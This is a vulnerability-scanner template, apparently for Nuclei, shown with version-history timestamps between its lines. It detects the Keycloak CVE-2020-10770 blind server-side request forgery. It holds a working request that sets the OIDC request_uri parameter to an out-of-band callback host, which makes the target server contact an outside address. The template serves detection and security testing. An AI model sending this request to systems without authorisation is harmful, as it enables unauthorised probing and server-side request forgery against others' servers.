2021-10-17 15:59:45 +00:00
id : CVE-2020-10770
info :
2023-02-11 04:59:02 +00:00
name : Keycloak <= 12.0.1 - request_uri Blind Server-Side Request Forgery (SSRF)
2021-10-17 15:59:45 +00:00
author : dhiyaneshDk
2021-10-17 16:01:55 +00:00
severity : medium
2023-02-10 21:01:43 +00:00
description : Keycloak 12.0.1 and below allows an attacker to force the server to request an unverified URL using the OIDC parameter request_uri. This allows an attacker to execute a server-side request forgery (SSRF) attack.
2021-10-17 15:59:45 +00:00
reference :
- https://packetstormsecurity.com/files/164499/Keycloak-12.0.1-Server-Side-Request-Forgery.html
- https://www.exploit-db.com/exploits/50405
2021-10-18 15:33:29 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-10770
2022-05-17 09:18:12 +00:00
- https://bugzilla.redhat.com/show_bug.cgi?id=1846270
2021-10-17 16:03:20 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 5.3
2021-10-17 16:03:20 +00:00
cve-id : CVE-2020-10770
2023-02-10 21:01:43 +00:00
cwe-id : CWE-918
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:*
epss-score : 0.36659
2022-08-27 04:41:18 +00:00
tags : keycloak,ssrf,oast,cve,cve2020,blind,packetstorm,edb
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-10-17 15:59:45 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-10-17 15:59:45 +00:00
- method : GET
path :
- '{{BaseURL}}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{{interactsh-url}}/'
2021-10-18 15:33:29 +00:00
2021-10-17 15:59:45 +00:00
matchers :
- type : word
part : interactsh_protocol # Confirms the HTTP Interaction
words :
- "http"
2022-08-05 13:57:51 +00:00
# Enhanced by cs 08/03/2022